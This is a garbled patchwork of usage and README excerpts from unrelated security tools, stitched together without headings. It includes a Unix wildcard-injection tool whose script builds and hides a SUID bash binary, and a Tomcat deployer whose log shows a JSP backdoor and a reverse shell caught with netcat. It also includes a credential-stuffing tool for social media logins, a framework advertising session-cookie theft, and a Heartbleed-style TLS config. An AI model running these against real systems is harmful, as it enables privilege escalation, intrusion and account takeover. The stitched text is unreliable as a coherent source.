usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

• combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
• tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
• rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

    --developer - Enable developer mode
    --verbose - Show more details on screen, reduce in normal mode
    --show-warnings-only - Only show warnings on screen
    --skip-plugins - Disable running any plugins (alias: --no-plugins)
    --quiet - Changed: become really quiet
    --config - Removed: use 'lynis show profiles' instead

$ java -jar shard-1.2.jar --help
Shard 1.2
Usage: java -jar shard-1.2.jar [options]

  -u, --username <value>  Username to test
  -p, --password <value>  Password to test
  -f, --file <value>      File containing a set of credentials
  --format <value>        The format of the credentials. Must be a regular expression with 2 capture groups. The first capture group for the username and the second capture group for the password. Defaults to a regex that will match:
    "username":"password"
  -l, --list              List available modules
  -v, --version <value>   Print the version
  --help                  prints java -jar shard-1.2.jar -u username-here -p password-herethis usage text

$ java -jar shard-1.2.jar -l
Available modules:
        Facebook
        LinkedIn
        Reddit
        Twitter
        Instagram

$ java -jar shard-1.2.jar -u username-here -p password-here
21:16:25.950 [+] Running in single credential mode
21:16:30.302 [+] username-here:password-here - Reddit, Instagram

$ java -jar shard-1.2.jar -f /tmp/creds.txt
21:16:39.501 [+] Running in multi-credential mode
21:16:39.516 [+] Parsed 2 credentials
21:16:42.794 [+] username1:password1 - Reddit, Instagram
21:16:45.189 [+] username2:password2 - Facebook, LinkedIn, Twitter

  def tryLogin(creds: Credentials): Boolean

• JSoup is used for HTTP communication and HTML parsing
• spray-json is used for handling json

• Some things might be broken
  • I.e., some error handling might be non-existent
• There might be random debug output printed out
• The search language might not be complete
• The data template used with ElasticSearch might change
  • Which means you might have ot re-ingest all of your data at some point!

• ElasticSearch installed somewhere
• python elasticsearch library (pip install elasticsearch)
• python lex yacc library (pip install ply)
• below specified prereqs too

plugin install mapper-murmur3

Usage: elasticsearch_populate.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  Input CSV file
  -d DIRECTORY, --directory=DIRECTORY
                        Directory to recursively search for CSV files -
                        prioritized over 'file'
  -e EXTENSION, --extension=EXTENSION
                        When scanning for CSV files only parse files with
                        given extension (default: 'csv')
  -i IDENTIFIER, --identifier=IDENTIFIER
                        Numerical identifier to use in update to signify
                        version (e.g., '8' or '20140120')
  -t THREADS, --threads=THREADS
                        Number of workers, defaults to 2. Note that each
                        worker will increase the load on your ES cluster
  -B BULK_SIZE, --bulk-size=BULK_SIZE
                        Size of Bulk Insert Requests
  -v, --verbose         Be verbose
  --vverbose            Be very verbose (Prints status of every domain parsed,
                        very noisy)
  -s, --stats           Print out Stats after running
  -x EXCLUDE, --exclude=EXCLUDE
                        Comma separated list of keys to exclude if updating
                        entry
  -n INCLUDE, --include=INCLUDE
                        Comma separated list of keys to include if updating
                        entry (mutually exclusive to -x)
  -o COMMENT, --comment=COMMENT
                        Comment to store with metadata
  -r, --redo            Attempt to re-import a failed import or import more
                        data, uses stored metatdata from previous import (-o
                        and -x not required and will be ignored!!)
  -u ES_URI, --es-uri=ES_URI
                        Location of ElasticSearch Server (e.g.,
                        foo.server.com:9200)
  -p INDEX_PREFIX, --index-prefix=INDEX_PREFIX
                        Index prefix to use in ElasticSearch (default: whois)
  --bulk-threads=BULK_THREADS
                        How many threads to use for making bulk requests to ES

• Install ElasticSearch. Using Docker is the easiest mechanism
• Download latest trimmed (smallest possible) whoisxmlapi quarterly DB dump.
• Extract the csv files.
  
• Use the included script in the scripts/ directory:
  

./elasticsearch_populate.py -u localhost:9200 -f ~/whois/data/1.csv -i '1' -v -s -x Audit_auditUpdatedDate,updatedDate,standardRegUpdatedDate,expiresDate,standardRegExpiresDate

• Copy pydat to /var/www/ (or prefered location)
• Copy pydat/custom_settings_example.py to pydat/custom_settings.py.
• Edit pydat/custom_settings.py to suit your needs.
  • Include your Passive DNS keys if you have any!
• Configure Apache to use the provided wsgi interface to pydat.

sudo apt-get install libapache2-mod-wsgi
sudo vi /etc/apache2/sites-available/whois

<VirtualHost *:80>
        ServerName whois
        ServerAlias whois
        # Install Location
        WSGIScriptAlias / /var/www/pydat/wsgi.py
        Alias /static/ /var/www/pydat/pydat/static/
<Location "/static/">
            Options -Indexes
</Location>
</VirtualHost>

docker run -d --name pydat -p 80:80 -v <path/to/custom_settings.py>:/opt/WhoDat/pydat/pydat/custom_settings.py mitrecnd/pydat

ajax/metadata/
ajax/metadata/<version>/

ajax/domain/<domainName>/
ajax/domain/<domainName>/latest/
ajax/domain/<domainName>/<version>/
ajax/domain/<domainName>/<version1>/<version2>/
ajax/domain/<domainName>/diff/<version1>/<version2>/

ajax/domains/<searchKey>/<searchValue>/
ajax/domains/<searchKey>/<searchValue>/latest/
ajax/domains/<searchKey>/<searchValue>/<version>/
ajax/domains/<searchKey>/<searchValue>/<version1>/<version2>/

domainName
registrant_name
contactEmail
registrant_telephone

curl http://pydat.myorg.domain/ajax/domain/google.com/latest/

curl http://pydat.myorg.domain/ajax/domains/domainName/google.com/

ajax/query

query - The query to search ES with
size - The number of elements to return (aka page size)
page - The page to return, combining this with size you can get the results in chunks
unique - Only accepted if ES scripting is enabled (read above)

user$ python tomcatWarDeployer.py --help

Apache Tomcat auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

  server        Specifies server address. Please also include port after colon.

Options:
  -h, --help            show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"

  Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/

  Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -t TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
                        generate own WAR file on-the-fly.

user$ python tomcatWarDeployer.py -C -x -v -H 192.168.56.101 -p 4545 -n shell 192.168.56.100:8080

    Apache Tomcat auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.101:4545.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for shell WAR at: "/tmp/tmpzndaGR"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/shell.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 541) (out= 254)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1597)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpzndaGR
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "shell" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/shell/"
DEBUG: Succeeded.
DEBUG: Deploying application: shell from file: "/tmp/shell.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpzndaGR"
DEBUG: Succeeded, invoking it...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/shell/"
DEBUG: Adding 'X-Pass: b8vYQ9EU7suV' header for shell functionality authentication.
WARNING: Set up your incoming shell listener, I'm giving you 3 seconds.
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/shell/
INFO: Happy pwning, here take that password for web shell: 'b8vYQ9EU7suV'

user $ nc -klvp 4545
listening on [any] 4545 ...
192.168.56.100: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.100] 44423
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

• Windows 8.1 x86-64
• Windows 7 SP1 x86 and x86-64
• WinDBG 6.3.9600.17200 x86 (since Firefox stable is x86-only currently)
• pykd version 0.3.0.36
• Many different Firefox releases, but extensively with: 31.7.0-esr , 35.0.1 , 36.0.1 , 38.0.5 , 39.0 , 40.0 , 43.0 . 44.0 .

!load pykd.pyd
!py c:\\tmp\\shadow\\pykd_driver help

[shadow] De Mysteriis Dom Firefox
[shadow] v1.0b

[shadow] jemalloc-specific commands:
[shadow]   jechunks                : dump info on all available chunks
[shadow]   jearenas                : dump info on jemalloc arenas
[shadow]   jerun <address>         : dump info on a single run
[shadow]   jeruns [-cs]            : dump info on jemalloc runs
[shadow]                                 -c : current runs only
[shadow]                    -s <size class> : runs for the given size class only
[shadow]   jebins                  : dump info on jemalloc bins
[shadow]   jeregions <size class>  : dump all current regions of the given size class
[shadow]   jesearch [-cfqs] <hex>  : search the heap for the given hex dword
[shadow]                                 -c : current runs only
[shadow]                                 -q : quick search (less details)
[shadow]                    -s <size class> : regions of the given size only
[shadow]                                 -f : search for filled region holes)
[shadow]   jeinfo <address>        : display all available details for an address
[shadow]   jedump [filename]       : dump all available jemalloc info to screen (default) or file
[shadow]   jeparse                 : parse jemalloc structures from memory
[shadow] Firefox-specific commands:
[shadow]   nursery                 : display info on the SpiderMonkey GC nursery
[shadow]   symbol [-vjdx] <size>   : display all Firefox symbols of the given size
[shadow]                                 -v : only class symbols with vtable
[shadow]                                 -j : only symbols from SpiderMonkey
[shadow]                                 -d : only DOM symbols
[shadow]                                 -x : only non-SpiderMonkey symbols
[shadow]   pa <address> [<length>] : modify the ArrayObject's length (default new length 0x666)
[shadow] Generic commands:
[shadow]   version                 : output version number
[shadow]   help                    : this help message

---------------------------------------------------------------------------------------

                                                    debugger-required frontend (glue)


+------------+     +-------------+     +-------------+
| gdb_driver |     | lldb_driver |     | pykd_driver |
+------------+     +-------------+     +-------------+
      ^                   ^                   ^
      |                   |                   |
------+-------------------+-------------------+----------------------------------------
      |                   |                   |   
      |                   +--------+          |
      +------------------------    |    +-----+        core logic (debugger-agnostic)
                              |    |    |
                              |    |    |
                           +-----------------+
  +------+                 |                 |
  |      |---------------> |      shadow     |<-----+
  | util |        +------> |                 |      |
  |      |        |        +-----------------+      |
  +------+        |          ^  ^     ^    ^        |
    | | |         |          |  |     |    |        |   +--------+
    | | |   +-----+----------+  |     +----+--------+---| symbol |
    | | |   |     |             |          |        |   +--------+
  +-+ | |   |  +----------+     |          |        |   +---------+
  |   | |   |  | jemalloc |     |          +--------+---| nursery |
  |   | |   |  +----------+     |                   |   +---------+
  |   | |   |   ^    ^   ^      |                   |
  |   | |   |   |    |   |      |                   |
  |   | |   |   |    |   +------+--------+          |
  |   | |   |   |    |          |        |          |
  |   | +---+---+----+----------+--------+-----+    |
  |   |     |   |    |          |        |     |    |
  |   +-----+---+----+----+     |        |     |    |
  |         |   |    |    |     |        |     |    |
--+---------+---+----+----+-----+--------+-----+----+----------------------------------
  |         |   |    |    |     |        |     |    |
  |         |   |    |    |     |        |     |    |       debugger-dependent APIs
  |         |   |    |    |     |        |     |    |
  |         |   |    |    |     |        |     |    |
  |         |   |    |    v     |        |     v    |
  |  +------------+  |  +-------------+  |  +-------------+
  +->| gdb_engine |  +--| lldb_engine |  +--| pykd_engine |
     +------------+     +-------------+     +-------------+
           ^                   ^                   ^
           |                   |                   |
       +---+         +---------+   +---------------+
       |             |             |
       |             |             |
-------+-------------+-------------+---------------------------------------------------
       |             |             |
       |             |             |                        debugger-provided backend
       |             |             |
       |             |             |
    +-----+      +------+      +------+
    | gdb |      | lldb |      | pykd |
    +-----+      +------+      +------+

---------------------------------------------------------------------------------------

• Bug fixes (tokenization and mapping updates)
  
• Global Search error handling, keyword highlighting
  
• Stacking on URL Domain and DNS, fixed stacking registry
  
• Reindex data utility added (see wiki article for usage)
  
• Upgrade feature added, you can now update the sourcecode from yum without downloading a new iso (see wiki article for usage)
  
• Rotate /media folder to remove old collections after 1 day (or > 2GB foldersize)
  
• Added w32system (system info)
  
• Removed static mapping in postController for hostname
  
• Fixed issue with building audit aggs where default_field was not being passed to ES.
  

1. Single view endpoint forensics (multiple audit types).
   
2. Global search.
   
3. Timelining.
   
4. Stacking.
   
5. Tagging.
   
6. Interactive process tree view.
   
7. Multiple file upload & Named investigations.
   

1. Latest nightHawk source.
   
2. CentOS 7 Minimal with core libs needed to operate nightHawk.
   
3. Nginx and UWSGI setup in reverse proxy (socketed and optimized), SSL enabled.
   
4. Latest Elasticsearch/Kibana (Kibana is exposed and useable if desired).
   
5. Sysctrl for all core services.
   
6. Logging (rotated) for all core services.
   
7. Configurable system settings, a list of these can be found in the /opt/nighthawk/etc/nightHawk.json file.
   

1. CPU/RAM.

1. HDD.

1. Parent/Child relationships:
   Documents are indexed via the GO app as parent/child relation. This was chosen because it is able to give relatively logical path to view documents, ie. the parent is the endpoint name and the children are audit types. Performing aggregations on a parent/child relational document at scale seems to make sense as well. The stacking framework relies on building parents in an array to then get all child document aggregations for certain audit types.
   
   
2. Sharding:
   Elasticsearch setups require tuning and proper design recognition. Sharding is important to understand because of the way we are linking parent/child documents. The child is ALWAYS routed to the parent, it cannot exist on its own. This means consideration must be given to how many shards are resident on the index. From what we understand, it may be wise to choose a setup that encorporates many nodes with single shards. To gain performance out of this kind of setup we are working on shard routed searches.
   We are currently working on designing the best possible configuration for fast searching.
   
   
3. Scaling:
   This application is designed to scale immensely. From inital design concept, we were able to run it smoothly on a single cpu 2gb ubuntu VM with 3 ES nodes (Macbook Pro), with about 4million+ documents (or 50 endpoints ingested). If going into production, running a setup with 64/128GB RAM and SAS storage, you would be able to maintain a lightning fast response time on document retrival whilst having many analysts working on the application at once.
   

1. DataTables mixed processing:
   There are several audit types ingested that are much to large to return all documents to the table. For example, URL history and Registry may return 15k doc's back to the DOM, rendering this would put strain on the client browser. To combat this, we are using ServerSide processing to page through results of certain audit types. This means you can also search over documents in audit type using Elasticsearch in the backend.
   
2. Tagging:
   Currently we can tag documents and view those comments. We can update them or change them. The analyst is able to give context such as Date/Analyst Name/Comment to the document.
   

$ cd TLS-Attacker
$ ./mvnw clean package

$ ./mvnw clean package -DskipTests=true

• Transport: Transport utilities for TCP and UDP.
• ModifiableVariable: Contains modifiable variables that allow one to execute (specific as well as random) variable modifications during the protocol flow. ModifiableVariables are used in the protocol messages.
• TLS: Protocol implementation, currently (D)TLS1.2 compatible.
• Attacks: Implementation of some well-known attacks and tests for these attacks.
• Fuzzer: Fuzzing framework implemented on top of the TLS-Attacker functionality.

• TLS versions 1.0 (RFC-2246), 1.1 (RFC-4346) and 1.2 (RFC-5246)
• DTLS 1.2 (RFC-6347)
• (EC)DH and RSA key exchange algorithms
• AES CBC cipher suites
• Extensions: EC, EC point format, Heartbeat, Max fragment length, Server name, Signature and Hash algorithms
• TLS client and server

$ cd TLS-Server
$ java -jar target/TLS-Server-1.0.jar ../resources/rsa1024.jks password TLS 4433

$ cd resources
$ openssl s_server -key rsa1024key.pem -cert rsa1024cert.pem

$ cd Runnable
$ java -jar target/TLS-Attacker-1.0.jar client

$ java -jar target/TLS-Attacker-1.0.jar client -connect localhost:4433 -cipher TLS_RSA_WITH_AES_256_CBC_SHA -version TLS11

$ cd resources
$ openssl s_server -key rsa1024key.pem -cert rsa1024cert.pem -verify ec256cert.pem

$ java -jar target/TLS-Attacker-1.0.jar client -connect localhost:4433 -cipher TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA -keystore ../resources/ec256.jks -password password -alias alias -client_authentication

$ java -jar target/TLS-Attacker-1.0.jar client -help

$ java -jar target/TLS-Attacker-1.1.jar server -port 4444 -keystore ../resources/rsa1024.jks -password password -alias alias

$ cd Runnable
$ java -jar target/TLS-Attacker-1.0.jar padding_oracle 

GeneralConfig generalConfig = new GeneralConfig();
ConfigHandler configHandler = ConfigHandlerFactory.createConfigHandler("client");
configHandler.initialize(generalConfig);

ClientCommandConfig config = new ClientCommandConfig();
config.setConnect("localhost:" + PORT);
config.setWorkflowTraceType(WorkflowTraceType.CLIENT_HELLO);

TransportHandler transportHandler = configHandler.initializeTransportHandler(config);
TlsContext tlsContext = configHandler.initializeTlsContext(config);

WorkflowTrace trace = tlsContext.getWorkflowTrace();
trace.add(new ServerHelloMessage(ConnectionEnd.SERVER));
trace.add(new CertificateMessage(ConnectionEnd.SERVER));
trace.add(new ServerHelloDoneMessage(ConnectionEnd.SERVER));
trace.add(new RSAClientKeyExchangeMessage(ConnectionEnd.CLIENT));
trace.add(new ChangeCipherSpecMessage(ConnectionEnd.CLIENT));
trace.add(new FinishedMessage(ConnectionEnd.CLIENT));
trace.add(new ChangeCipherSpecMessage(ConnectionEnd.SERVER));
trace.add(new FinishedMessage(ConnectionEnd.SERVER));

WorkflowExecutor workflowExecutor = configHandler.initializeWorkflowExecutor(transportHandler, tlsContext);
workflowExecutor.executeWorkflow();

transportHandler.closeConnection();

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workflowTrace>
<protocolMessages>
<ClientHello>
<messageIssuer>CLIENT</messageIssuer>
<extensions>
<EllipticCurves>
<supportedCurvesConfig>SECP192R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP256R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP384R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP521R1</supportedCurvesConfig>
</EllipticCurves>
<ECPointFormat>
<pointFormatsConfig>UNCOMPRESSED</pointFormatsConfig>
</ECPointFormat>
<SignatureAndHashAlgorithmsExtension>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA512</hashAlgorithm>
<signatureAlgorithm>RSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA512</hashAlgorithm>
<signatureAlgorithm>ECDSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA256</hashAlgorithm>
<signatureAlgorithm>RSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA256</hashAlgorithm>
<signatureAlgorithm>ECDSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA1</hashAlgorithm>
<signatureAlgorithm>RSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
<signatureAndHashAlgorithmsConfig>
<hashAlgorithm>SHA1</hashAlgorithm>
<signatureAlgorithm>ECDSA</signatureAlgorithm>
</signatureAndHashAlgorithmsConfig>
</SignatureAndHashAlgorithmsExtension>
</extensions>
<supportedCompressionMethods>
<CompressionMethod>NULL</CompressionMethod>
</supportedCompressionMethods>
<supportedCipherSuites>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
</supportedCipherSuites>
</ClientHello>
<ServerHello>
<messageIssuer>SERVER</messageIssuer>
</ServerHello>
<Certificate>
<messageIssuer>SERVER</messageIssuer>
</Certificate>
<ECDHEServerKeyExchange>
<messageIssuer>SERVER</messageIssuer>
</ECDHEServerKeyExchange>
<ServerHelloDone>
<messageIssuer>SERVER</messageIssuer>
</ServerHelloDone>
<ECDHClientKeyExchange>
<messageIssuer>CLIENT</messageIssuer>
</ECDHClientKeyExchange>
<ChangeCipherSpec>
<messageIssuer>CLIENT</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>CLIENT</messageIssuer>
</Finished>
<ChangeCipherSpec>
<messageIssuer>SERVER</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>SERVER</messageIssuer>
</Finished>
</protocolMessages>
</workflowTrace>

$ java -jar target/TLS-Attacker-1.0.jar client -workflow_input config.xml

ModifiableInteger i = new ModifiableInteger();
i.setOriginalValue(30);
i.setModification(new AddModification(20));
System.out.println(i.getValue());  // 50

<workflowTrace>
<protocolMessages>
<ClientHello>
<messageIssuer>CLIENT</messageIssuer>
<extensions>
<HeartbeatExtension>
<heartbeatModeConfig>PEER_ALLOWED_TO_SEND</heartbeatModeConfig>
</HeartbeatExtension>
</extensions>
<supportedCompressionMethods>
<CompressionMethod>NULL</CompressionMethod>
</supportedCompressionMethods>
<supportedCipherSuites>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
<CipherSuite>TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
</supportedCipherSuites>
</ClientHello>
<ServerHello>
<messageIssuer>SERVER</messageIssuer>
</ServerHello>
<Certificate>
<messageIssuer>SERVER</messageIssuer>
</Certificate>
<ECDHEServerKeyExchange>
<messageIssuer>SERVER</messageIssuer>
</ECDHEServerKeyExchange>
<ServerHelloDone>
<messageIssuer>SERVER</messageIssuer>
</ServerHelloDone>
<ECDHClientKeyExchange>
<messageIssuer>CLIENT</messageIssuer>
</ECDHClientKeyExchange>
<ChangeCipherSpec>
<messageIssuer>CLIENT</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>CLIENT</messageIssuer>
</Finished>
<ChangeCipherSpec>
<messageIssuer>SERVER</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>SERVER</messageIssuer>
</Finished>
<Heartbeat>
<messageIssuer>CLIENT</messageIssuer>
<payloadLength>
<integerAddModification>
<summand>2000</summand>
</integerAddModification>
</payloadLength>
</Heartbeat>
<Heartbeat>
<messageIssuer>SERVER</messageIssuer>
</Heartbeat>
</protocolMessages>
</workflowTrace>

• Florian Pfützenreuter: DTLS 1.2
• Felix Lange: EAP-TLS
• Philip Riese: Server implementation, TLS Man-in-the-Middle handling
• Christian Mainka: Design support and many implementation suggestions.

• Tibor Jager, Jörg Schwenk, Juraj Somorovsky. On the Security of TLS 1.3 and QUIC Against Weaknesses in PKCS#1 v1.5 Encryption. CCS'15. https://www.nds.rub.de/research/publications/ccs15/
• Tibor Jager, Jörg Schwenk, Juraj Somorovsky. Practical Invalid Curve Attacks on TLS-ECDH. ESORICS'15. https://www.nds.rub.de/research/publications/ESORICS15/
• Quellcode-basierte Untersuchung von kryptographisch relevanten Aspekten der OpenSSL-Bibliothek. https://www.bsi.bund.de/DE/Publikationen/Studien/OpenSSL-Bibliothek/opensslbibliothek.html

• Payload Store
• Shell Generator (PHP/ASP/JSP/JSPX/CFM)
• Payload Encoder and Decoder (Base64/Rot13/Hex/Hexwith \x seperator/ Hex with 0x Prefix)
• CURL GUI (GET/POST/TRACE/OPTIONS/HEAD)
• LFI Exploitation module (currently prepacked with: Koha Lib Lime LFI/ Wordpress Aspose E-book generator LFI/ Zimbra Collaboration Server LFI)
• HTTP Bot Herd to control web shells.
• WHOIS
• String Tools
• Client Side Obfuscator
• Cookie Theft Database (Enables you to steal session cookies & download page content if a stored XSS is present)

• tmp
• framework/data
• framework/data/site_config.json
• incoming/
• scripts/

• Mongo DB
• MSSQL
• PostgreSQL
• SQLite
• MySQL

• Apache
• Litespeed
• Nginx
• Lighttpd

• Microsoft Windows XP Service Pack 2 and 3
• Microsoft Windows 7 Service Pack 0 and 1
• Microsoft Windows 8 and 8.1
• Linux Kernels 2.6.24 to 3.10.
• OSX 10.7-10.10.x.

rekall webconsole --browser   

sudo pip install rekall   

sudo pip install --pre rekall   

Who can use it

• Debian jessie core
• Custom hardened linux 4.5 kernel
• Rolling release upgrade line
• MATE desktop environment
• Lightdm Dislpay Manager
• Custom themes, icons and wallpapers

• CPU: at least 1Ghz dual core cpu
• ARCH: 32bit, 64bit and ARMhf
• RAM: 256Mb - 512Mb suggested
• GPU: No graphic acceleration required
• HDD Standard: 6Gb used - 8Gb suggested
• HDD Full: 8Gb used - 16Gb suggested
• BOOT: Legacy bios or UEFI (testing)

• Parrot Server Edition
• Parrot Cloud Controller
• Parrot VPS Service
• Custom installation script for Debian VPS

• "Forensic" boot option to avoid boot automounts
• Most famous Digital Forensic tools and frameworks out of the box
• Reliable acquisition and imaging tools
• Top class analysis softwares
• Evidence management and reporting tools
• Disabled automount
• Software blockdev write protection system

• Custom Anti Forensic tools
• Custom interfaces for GPG
• Custom interfaces for cryptsetup
• Support for LUKS, Truecrypt and VeraCrypt
• NUKE patch for cryptsetup LUKS disks
• Encrypted system installation

• AnonSurf
• Entire system anonymization
• TOR and I2P out of the box
• DNS requests anonymization
• "Change Identity" function for AnonSurf
• BleachBit system cleaner
• NoScript plugin
• UserAgentOverrider plugin
• Browser profile manager
• RAM-only browser profile
• Pandora's Box - RAM cleaner
• Hardened system behaviour

• FALCON Programming Language (1.0)
• System editor tuned for programming
• Many compilers and debuggers available
• Reverse Engineering Tools
• Programming Template Files
• Pre-installed most-used libs
• Full Qt5 development framework
• Full .net/mono development framework
• Development frameworks for embedded devices

•     Static Analysis
•     Dynamic Analysis
•     Memory Analysis

•     Determining the File Type: Determining the file type can also help you understand the type of environment the malware is targeted towards, for example if the file type is ELF (Executable and Linkable format) format which is a standard binary file format for Unix and Unix-like systems, then it can be concluded that the malware is targeted towards a Unix or Unix flavoured systems
•     Determining the Cryptographic Hash: Cryptographic Hash values like MD5 and SHA1 can serve as a unique identifier for the file throughout the course of analysis. Malware, after executing can copy itself to a different location or drop another piece of malware, cryptographic hash can help you determine whether the newly copied/dropped sample is same as the original sample or a different one. With this information we can determine if malware analysis needs to be performed on a single sample or multiple samples. Cryptographic hash can also be submitted to online antivirus scanners like VirusTotal to determine if it has been previously detected by any of the AV vendors. Cryptographic hash can also be used to search for the specific malware sample on the internet. 
